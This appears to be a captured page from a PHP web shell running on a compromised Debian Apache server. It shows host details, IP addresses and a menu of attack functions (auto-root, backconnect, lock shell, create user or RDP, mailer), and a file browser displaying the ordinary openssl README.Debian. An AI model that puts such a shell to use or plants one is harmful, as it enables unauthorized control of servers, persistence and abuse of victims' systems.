Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 216.73.216.105
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
ifk
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
openssl /
[ HOME SHELL ]
Name
Size
Permission
Action
HOWTO
[ DIR ]
drwxr-xr-x
FAQ
84
B
-rw-r--r--
NEWS.Debian.gz
252
B
-rw-r--r--
NEWS.gz
13.41
KB
-rw-r--r--
README
3.08
KB
-rw-r--r--
README.Debian
2.53
KB
-rw-r--r--
README.ENGINE.gz
5.89
KB
-rw-r--r--
README.optimization
1.35
KB
-rw-r--r--
changelog.Debian.gz
26.77
KB
-rw-r--r--
changelog.gz
195.61
KB
-rw-r--r--
copyright
6.39
KB
-rw-r--r--
fingerprints.txt
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.Debian
openssl for DEBIAN ---------------------- openssl replaces ssleay. The application links to openssl like req, ca, verify and s_client have been removed. Instead of `<application>` please call now `openssl <application>` eg: instead of `req` please call `openssl req` TLS protovol version and RSA key size ------------------------------------- The default system global policy is to support TLSv1.2+ and security level two. Please see https://www.openssl.org/docs/man1.1.1/man5/config.html https://www.openssl.org/docs/man1.1.1/man3/SSL_CTX_set_security_level.html#DEFAULT-CALLBACK-BEHAVIOUR for configurations details of `MinProtocol' and `CipherString' in /etc/ssl/openssl.cnf case you really require to support legacy systems. PATENT ISSUES ------------- Some algorithms used in the library are covered by patents. As a result, the following algorithms in libcrypto have been disabled: - RC5 - MDC2 - IDEA Also see the patents section in the README file. Self-signed certs and webservers: --------------------------------- If you get with a selfsigned certificate and a webserver: > "The certificate is not approved for the attempted operation." Bodo_Moeller@public.uni-hamburg.de (Bodo Moeller) writes: >Probably you are using a CA certificate for your server; if you use >"openssl req" to generate a new key and self-signed certificate with >the default openssl.cnf, the certificate you get includes certain >X.509v3 extensions that make it unfit for use as a server certificate. >This was not so with earlier versions of the software because back >then there was far less X.509v3 support. > >To look at the certificate some HTTPS server presents to its cliens, >use "openssl s_client -port 443 -host your.server", store the output >(at least the part from "-----BEGIN CERTIFICATE-----" up to "-----END >CERTIFICATE-----", including these separators) in a file and use >"openssl x509 -in the_file_you_just_stored -text" to look at it in >readable form. If it has in the "X509v3 extensions section" any of >the following entries, it is not usable as a server certificate: > > X509v3 Basic Constraints: > CA:TRUE > > X509v3 Key Usage: > Certificate Sign, CRL Sign > >To quickly create a new server key and certificate that works with >Netscape, you can just copy the original openssl.cnf file and comment >out the "x509_extensions" entry in the "[ req ]" section. >The, use "openssl req ..." as before to create a new certificate and >key. Christoph Martin <martin@uni-mainz.de>, Wed, 31 Mar 1999 16:00:51 +0200
Close
